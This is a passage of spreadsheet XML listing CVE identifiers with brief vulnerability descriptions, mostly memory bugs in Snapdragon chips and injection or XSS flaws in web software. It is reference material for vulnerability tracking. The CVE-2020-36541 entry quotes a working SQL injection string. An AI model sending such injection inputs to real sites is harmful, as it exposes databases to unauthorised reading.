    <t>An issue was discovered in the acc_reader crate through 2020-12-27 for Rust. read_up_to may read from uninitialized memory locations.</t>
  </si>
  <si>
    <t>CVE-2020-36514</t>
  </si>
  <si>
    <t>An issue was discovered in the acc_reader crate through 2020-12-27 for Rust. fill_buf may read from uninitialized memory locations.</t>
  </si>
  <si>
    <t>CVE-2020-36516</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel through 5.16.11. The mixed IPID assignment method with the hash-based IPID assignment policy allows an off-path attacker to inject data into a victim's TCP session or terminate that session.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-36517</t>
  </si>
  <si>
    <t>An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.</t>
  </si>
  <si>
    <t>CVE-2020-36518</t>
  </si>
  <si>
    <t>jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.</t>
  </si>
  <si>
    <t>CVE-2020-36519</t>
  </si>
  <si>
    <t>Mimecast Email Security before 2020-01-10 allows any admin to spoof any domain, and pass DMARC alignment via SPF. This occurs through misuse of the address rewrite feature. (The domain being spoofed must be a customer in the Mimecast grid from which the spoofing occurs.)</t>
  </si>
  <si>
    <t>CVE-2020-3652</t>
  </si>
  <si>
    <t>Possible buffer over-read issue in windows x86 wlan driver function while processing beacon or request frame due to lack of check of length of variable received. in Snapdragon Compute, Snapdragon Connectivity in MSM8998, QCA6390, SC7180, SC8180X, SDM850</t>
  </si>
  <si>
    <t>CVE-2020-36521</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iCloud for Windows 11.4, iOS 14.0 and iPadOS 14.0, watchOS 7.0, tvOS 14.0, iCloud for Windows 7.21, iTunes for Windows 12.10.9. Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose memory contents.</t>
  </si>
  <si>
    <t>CVE-2020-36523</t>
  </si>
  <si>
    <t>A vulnerability was found in PlantUML 6.43. It has been declared as problematic. Affected by this vulnerability is the component Database Information Macro. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36524</t>
  </si>
  <si>
    <t>A vulnerability was found in Refined Toolkit. It has been rated as problematic. Affected by this issue is some unknown functionality of the component UI-Image/UI-Button. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36525</t>
  </si>
  <si>
    <t>A vulnerability classified as problematic has been found in Linking. This affects an unknown part of the component New Windows Macro. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36526</t>
  </si>
  <si>
    <t>A vulnerability classified as problematic was found in Countdown Timer. This vulnerability affects unknown code of the component Macro Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36527</t>
  </si>
  <si>
    <t>A vulnerability, which was classified as problematic, has been found in Server Status. This issue affects some unknown processing of the component HTTP Status/SMTP Status. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36528</t>
  </si>
  <si>
    <t>A vulnerability, which was classified as critical, was found in Platinum Mobile 1.0.4.850. Affected is /MobileHandler.ashx which leads to broken access control. The attack requires authentication. Upgrading to version 1.0.4.851 is able to address this issue. It is recommended to upgrade the affected component.</t>
  </si>
  <si>
    <t>CVE-2020-36529</t>
  </si>
  <si>
    <t>A vulnerability classified as critical has been found in SevOne Network Management System up to 5.7.2.22. This affects the file traceroute.php of the Traceroute Handler. The manipulation leads to privilege escalation with a command injection. It is possible to initiate the attack remotely.</t>
  </si>
  <si>
    <t>CVE-2020-3653</t>
  </si>
  <si>
    <t>Possible buffer over-read in windows wlan driver function due to lack of check of length of variable received from userspace in Snapdragon Compute, Snapdragon Connectivity in MSM8998, QCA6390, SC7180, SC8180X, SDM850</t>
  </si>
  <si>
    <t>CVE-2020-36530</t>
  </si>
  <si>
    <t>A vulnerability classified as critical was found in SevOne Network Management System up to 5.7.2.22. This vulnerability affects the Alert Summary. The manipulation leads to sql injection. The attack can be initiated remotely.</t>
  </si>
  <si>
    <t>CVE-2020-36531</t>
  </si>
  <si>
    <t>A vulnerability, which was classified as critical, has been found in SevOne Network Management System up to 5.7.2.22. This issue affects the Device Manager Page. An injection leads to privilege escalation. The attack may be initiated remotely.</t>
  </si>
  <si>
    <t>CVE-2020-36532</t>
  </si>
  <si>
    <t>A vulnerability has been found in Klapp App and classified as problematic. This vulnerability affects unknown code of the component Authorization. The manipulation leads to information disclosure (Credentials). The attack can be initiated remotely. It is recommended to upgrade the affected app.</t>
  </si>
  <si>
    <t>CVE-2020-36533</t>
  </si>
  <si>
    <t>A vulnerability was found in Klapp App and classified as problematic. This issue affects some unknown processing of the JSON Web Token Handler. The manipulation leads to weak authentication. The attack may be initiated remotely.</t>
  </si>
  <si>
    <t>CVE-2020-36534</t>
  </si>
  <si>
    <t>A vulnerability was found in easyii CMS. It has been classified as problematic. Affected is an unknown function of the file /admin/sign/out. The manipulation leads to cross site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36535</t>
  </si>
  <si>
    <t>A vulnerability classified as critical has been found in MINMAX. This affects an unknown part of the file /newsDia.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely.</t>
  </si>
  <si>
    <t>CVE-2020-36536</t>
  </si>
  <si>
    <t>A vulnerability was found in Brandbugle. It has been rated as critical. Affected by this issue is some unknown functionality of the file /main.php. The manipulation leads to sql injection. The attack may be launched remotely.</t>
  </si>
  <si>
    <t>CVE-2020-36537</t>
  </si>
  <si>
    <t>A vulnerability was found in Everywhere CMS. It has been classified as critical. Affected is an unknown function. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely.</t>
  </si>
  <si>
    <t>CVE-2020-36538</t>
  </si>
  <si>
    <t>A vulnerability was found in Eatan CMS. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The attack can be launched remotely.</t>
  </si>
  <si>
    <t>CVE-2020-36539</t>
  </si>
  <si>
    <t>A vulnerability was found in Lógico y Creativo 1.0 and classified as critical. This issue affects some unknown processing. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely.</t>
  </si>
  <si>
    <t>CVE-2020-3654</t>
  </si>
  <si>
    <t>u'Buffer overflow occurs while processing SIP message packet due to lack of check of index validation before copying into it' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8053, APQ8096AU, APQ8098, Bitra, Kamorta, MSM8905, MSM8909W, MSM8917, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCA6390, QCA6574AU, QCM2150, QCS605, QM215, Rennell, SA6155P, SA8155P, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36540</t>
  </si>
  <si>
    <t>A vulnerability, which was classified as critical, was found in Neetai Tech. Affected is an unknown function of the file /product.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36541</t>
  </si>
  <si>
    <t>A vulnerability was found in Demokratian. It has been rated as critical. Affected by this issue is some unknown functionality of the file basicos_php/genera_select.php. The manipulation of the argument id_provincia with the input -1%20union%20all%20select%201,2,3,4,database() leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.</t>
  </si>
  <si>
    <t>CVE-2020-36542</t>
  </si>
  <si>
    <t>A vulnerability classified as critical has been found in Demokratian. This affects an unknown part of the file install/install3.php. The manipulation leads to privilege escalation. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.</t>
  </si>
  <si>
    <t>CVE-2020-36543</t>
  </si>
  <si>
    <t>A vulnerability, which was classified as critical, was found in SialWeb CMS. This affects an unknown part of the file /about.php. The manipulation of the argument Id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36544</t>
  </si>
  <si>
    <t>A vulnerability has been found in SialWeb CMS and classified as problematic. This vulnerability affects unknown code of the component Search Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t>
  </si>
  <si>
    <t>CVE-2020-36547</t>
  </si>
  <si>
    <t>A vulnerability was found in GE Voluson S8. It has been rated as critical. This issue affects the Service Browser which itroduces hard-coded credentials. Attacking locally is a requirement. It is recommended to change the configuration settings.</t>
  </si>
  <si>
    <t>CVE-2020-36548</t>
  </si>
  <si>
    <t>A vulnerability classified as problematic has been found in GE Voluson S8. Affected is the file /uscgi-bin/users.cgi of the Service Browser. The manipulation leads to improper authentication and elevated access possibilities. It is possible to launch the attack on the local host.</t>
  </si>
  <si>
    <t>CVE-2020-36549</t>
  </si>
  <si>
    <t>A vulnerability classified as critical was found in GE Voluson S8. Affected is the underlying Windows XP operating system. Missing patches might introduce an excessive attack surface. Access to the local network is required for this attack to succeed.</t>
  </si>
  <si>
    <t>CVE-2020-36550</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in sourcecodester Multi Restaurant Table Reservation System 1.0 via the Table Name field to /dashboard/table-list.php.</t>
  </si>
  <si>
    <t>CVE-2020-36551</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in sourcecodester Multi Restaurant Table Reservation System 1.0 via the Item Name field to /dashboard/menu-list.php.</t>
  </si>
  <si>
    <t>CVE-2020-36552</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in sourcecodester Multi Restaurant Table Reservation System 1.0 via the Made field to /dashboard/menu-list.php.</t>
  </si>
  <si>
    <t>CVE-2020-36553</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in sourcecodester Multi Restaurant Table Reservation System 1.0 via the Area(food_type) field to /dashboard/menu-list.php.</t>
  </si>
  <si>
    <t>CVE-2020-36557</t>
  </si>
  <si>
    <t>A race condition in the Linux kernel before 5.6.2 between the VT_DISALLOCATE ioctl and closing/opening of ttys could lead to a use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-36558</t>
  </si>
  <si>
    <t>A race condition in the Linux kernel before 5.5.7 involving VT_RESIZEX could lead to a NULL pointer dereference and general protection fault.</t>
  </si>
  <si>
    <t>CVE-2020-3656</t>
  </si>
  <si>
    <t>Out of bound access can happen in MHI command process due to lack of check of command channel id value received from MHI devices in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, Kamorta, MDM9607, MSM8917, MSM8953, Nicobar, QCM2150, QCS405, QCS605, QM215, Rennell, SA6155P, SA8155P, Saipan, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM710, SDM845, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3657</t>
  </si>
  <si>
    <t>u'Remote code execution can happen by sending a carefully crafted POST query when Device configuration is accessed from a tethered client through webserver due to lack of array bound check.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, IPQ4019, IPQ6018, IPQ8064, IPQ8074, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8953, MSM8996AU, QCA6574AU, QCS405, QCS610, QRB5165, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SDX55, SM8250</t>
  </si>
  <si>
    <t>CVE-2020-3658</t>
  </si>
  <si>
    <t>Possible null-pointer dereference can occur while parsing mp4 clip with corrupted sample table atoms in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, QCA6574AU, QCS405, QCS605, QM215, Rennell, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36599</t>
  </si>
  <si>
    <t>lib/omniauth/failure_endpoint.rb in OmniAuth before 1.9.2 (and before 2.0) does not escape the message_key value.</t>
  </si>
  <si>
    <t>CVE-2020-3660</t>
  </si>
  <si>
    <t>Possible null-pointer dereference can occur while parsing mp4 clip with corrupted sample table atoms in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8917, MSM8953, MSM8996, MSM8996AU, MSM8998, QCA6574AU, QCS405, QCS605, QM215, Rennell, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-36600</t>
  </si>
  <si>
    <t>Out-of-bounds write vulnerability in the power consumption module. Successful exploitation of this vulnerability may cause the system to restart.</t>
  </si>
  <si>
    <t>CVE-2020-36601</t>
  </si>
  <si>
    <t>Out-of-bounds write vulnerability in the kernel modules. Successful exploitation of this vulnerability may cause a panic reboot.</t>
  </si>
  <si>
    <t>CVE-2020-36602</t>
  </si>
  <si>
    <t>There is an out-of-bounds read and write vulnerability in some headset products. An unauthenticated attacker gets the device physically and crafts malformed message with specific parameter and sends the message to the affected products. Due to insufficient validation of message, which may be exploited to cause out-of-bounds read and write.</t>
  </si>
  <si>
    <t>CVE-2020-36603</t>
  </si>
  <si>
    <t>The HoYoVerse (formerly miHoYo) Genshin Impact mhyprot2.sys 1.0.0.0 anti-cheat driver does not adequately restrict unprivileged function calls, allowing local, unprivileged users to execute arbitrary code with SYSTEM privileges on Microsoft Windows systems. The mhyprot2.sys driver must first be installed by a user with administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2020-36604</t>
  </si>
  <si>
    <t>hoek before 8.5.1 and 9.x before 9.0.3 allows prototype poisoning in the clone function.</t>
  </si>
  <si>
    <t>CVE-2020-36605</t>
  </si>
  <si>
    <t>Incorrect Default Permissions vulnerability in Hitachi Infrastructure Analytics Advisor on Linux (Analytics probe component), Hitachi Ops Center Analyzer on Linux (Analyzer probe component), Hitachi Ops Center Viewpoint on Linux (Viewpoint RAID Agent component) allows local users to read and write specific files.</t>
  </si>
  <si>
    <t>CVE-2020-36608</t>
  </si>
  <si>
    <t>A vulnerability, which was classified as problematic, has been found in Tribal Systems Zenario CMS. Affected by this issue is some unknown functionality of the file admin_organizer.js of the component Error Log Module. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is dfd0afacb26c3682a847bea7b49ea440b63f3baa. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-212816.</t>
  </si>
  <si>
    <t>CVE-2020-3661</t>
  </si>
  <si>
    <t>Buffer overflow will happen while parsing mp4 clip with corrupted sample atoms values which exceeds MAX_UINT32 range due to lack of validation checks in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, QCA6574AU, QCS405, QCS605, QM215, Rennell, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3662</t>
  </si>
  <si>
    <t>Buffer overflow can occur while parsing eac3 header while playing the clip which is nonstandard in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MSM8909W, MSM8917, MSM8953, MSM8996, MSM8996AU, MSM8998, QCA6574AU, QCS405, QCS605, QM215, Rennell, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3663</t>
  </si>
  <si>
    <t>Buffer over-write may occur during fetching track decoder specific information if cb size exceeds buffer size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9206, MDM9207C, MDM9607, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8998, QCA6574AU, QCS405, QCS605, QM215, Rennell, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3664</t>
  </si>
  <si>
    <t>Out of bound read access in hypervisor due to an invalid read access attempt by passing invalid addresses in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-3665</t>
  </si>
  <si>
    <t>A possible buffer overflow would occur while processing command from firmware due to the group_id obtained from the firmware being out of range in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8053, APQ8096AU, MDM9206, MDM9207C, MDM9607, MDM9615, MDM9640, MDM9650, MSM8909W, MSM8996, MSM8996AU, QCA6174A, QCA9377, QCA9379, SDM439, SDM636, SDM660, SDX20, SDX24, SM8150</t>
  </si>
  <si>
    <t>CVE-2020-3666</t>
  </si>
  <si>
    <t>u'Out of bounds memory access during memory copy while processing Host command' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, IPQ4019, IPQ6018, IPQ8064, IPQ8074, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8996AU, MSM8998, QCA6174A, QCA6574, QCA6574AU, QCA6584AU, QCA8081, QCA9377, QCA9379, QCA9531, QCA9558, QCA9563, QCA9880, QCA9886, QCA9980, QCN5500, QCN5502, QCS404, QCS405, QCS605, SA6155P, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3667</t>
  </si>
  <si>
    <t>u'Buffer Overflow in mic calculation for WPA due to copying data into buffer without validating the length of buffer' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8098, IPQ5018, IPQ6018, IPQ8074, Kamorta, MSM8998, Nicobar, QCA6390, QCA8081, QCS404, QCS405, QCS605, Rennell, SA415M, Saipan, SC7180, SC8180X, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SM6150, SM7150, SM8150, SM8250, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3668</t>
  </si>
  <si>
    <t>u'Buffer overflow while parsing PMF enabled MCBC frames due to frame length being lesser than what is expected while parsing' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in IPQ6018, IPQ8074, Kamorta, Nicobar, QCA6390, QCA8081, QCN7605, QCS404, QCS405, QCS605, Rennell, SA415M, SC7180, SC8180X, SDA845, SDM670, SDM710, SDM845, SDM850, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3669</t>
  </si>
  <si>
    <t>u'Buffer Overflow issue in WLAN tcp ip verification due to usage of out of range pointer offset' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in APQ8098, IPQ5018, IPQ6018, IPQ8074, Kamorta, MSM8998, Nicobar, QCA6390, QCA8081, QCN7605, QCS404, QCS405, QCS605, Rennell, SA415M, SC7180, SC8180X, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SM6150, SM7150, SM8150, SM8250, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3670</t>
  </si>
  <si>
    <t>u'Potential out of bounds read while processing downlink NAS transport message due to improper length check of Information Element(IEI) NAS message container' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8053, APQ8096AU, APQ8098, Kamorta, MDM9150, MDM9205, MDM9206, MDM9625, MDM9635M, MDM9640, MDM9645, MDM9650, MDM9655, MSM8905, MSM8909W, MSM8917, MSM8940, MSM8953, MSM8996AU, MSM8998, Nicobar, QCM2150, QCM6125, QCS605, QCS610, QM215, Rennell, SA415M, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3671</t>
  </si>
  <si>
    <t>Use-after-free issue could occur due to dangling pointer when generating a frame buffer in OpenGL ES in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music in APQ8009, Nicobar, QCM2150, QCS405, Saipan, SDM845, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3673</t>
  </si>
  <si>
    <t>u'Buffer overflow can happen as part of SIP message packet processing while storing values in array due to lack of check to validate the index length' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in Agatti, APQ8053, APQ8096AU, APQ8098, Bitra, Kamorta, MSM8905, MSM8909W, MSM8917, MSM8940, MSM8953, MSM8996AU, Nicobar, QCA6390, QCA6574AU, QCM2150, QCS605, QM215, Rennell, SA6155P, SA8155P, Saipan, SDA660, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3674</t>
  </si>
  <si>
    <t>Information can leak into userspace due to improper transfer of data from kernel to userspace in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in Nicobar, QCS405, Saipan, SC8180X, SDX55, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3675</t>
  </si>
  <si>
    <t>u'Potential integer underflow while parsing Service Info and IPv6 link-local TLVs that comes as part of NDPE attribute' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in IPQ5018, IPQ6018, IPQ8074, Kamorta, Nicobar, QCA6390, QCN7605, QCS404, QCS405, Rennell, SA415M, Saipan, SC7180, SC8180X, SDX55, SM6150, SM7150, SM8150, SM8250</t>
  </si>
  <si>
    <t>CVE-2020-3676</t>
  </si>
  <si>
    <t>Possible memory corruption in perfservice due to improper validation array length taken from user application. in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8096AU, APQ8098, Kamorta, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8998, Nicobar, QCM2150, QCS605, QM215, Rennell, Saipan, SDM429, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3678</t>
  </si>
  <si>
    <t>u'A buffer overflow could occur if the API is improperly used due to UIE init does not contain a buffer size a param' in Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking in Agatti, Kamorta, QCS404, QCS605, SDA845, SDM670, SDM710, SDM845, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3679</t>
  </si>
  <si>
    <t>u'During execution after Address Space Layout Randomization is turned on for QTEE, part of code is still mapped at known address including code segments' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in Bitra, Kamorta, Nicobar, QCS404, QCS610, Rennell, SA6155P, SA8155P, Saipan, SC7180, SC8180X, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3680</t>
  </si>
  <si>
    <t>A race condition can occur when using the fastrpc memory mapping API. in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009, APQ8053, MSM8909W, MSM8917, MSM8953, QCS605, QM215, SA415M, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM670, SDM710, SDM845, SDX24, SXR1130</t>
  </si>
  <si>
    <t>CVE-2020-3681</t>
  </si>
  <si>
    <t>Authenticated and encrypted payload MMEs can be forged and remotely sent to any HPAV2 system using a jailbreak key recoverable from code.</t>
  </si>
  <si>
    <t>CVE-2020-3684</t>
  </si>
  <si>
    <t>u'QSEE reads the access permission policy for the SMEM TOC partition from the SMEM TOC contents populated by XBL Loader and applies them without validation' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, APQ8098, Bitra, IPQ6018, Kamorta, MDM9150, MDM9205, MDM9206, MDM9607, MDM9650, MSM8905, MSM8998, Nicobar, QCA6390, QCS404, QCS405, QCS605, QCS610, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC7180, SC8180X, SDA660, SDA845, SDM630, SDM636, SDM660, SDM670, SDM710, SDM845, SDM850, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-3685</t>
  </si>
  <si>
    <t>Pointer variable which is freed is not cleared can result in memory corruption and leads to denial of service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-3686</t>
  </si>
  <si>
    <t>Possible memory out of bound issue during music playback when an incorrect bit stream content is copied into array without checking the length of array in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-3687</t>
  </si>
  <si>
